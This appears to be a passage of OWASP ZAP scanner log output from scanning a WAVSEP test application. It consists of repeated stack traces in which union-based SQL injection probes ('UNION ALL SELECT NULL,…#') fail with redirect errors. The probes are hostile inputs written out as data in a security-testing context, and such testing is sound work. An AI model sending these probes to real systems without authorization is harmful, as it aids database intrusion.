org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681531 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681532 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681532 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681533 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681533 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681535 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681535 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681536 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681537 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681538 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681538 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681539 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681540 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: 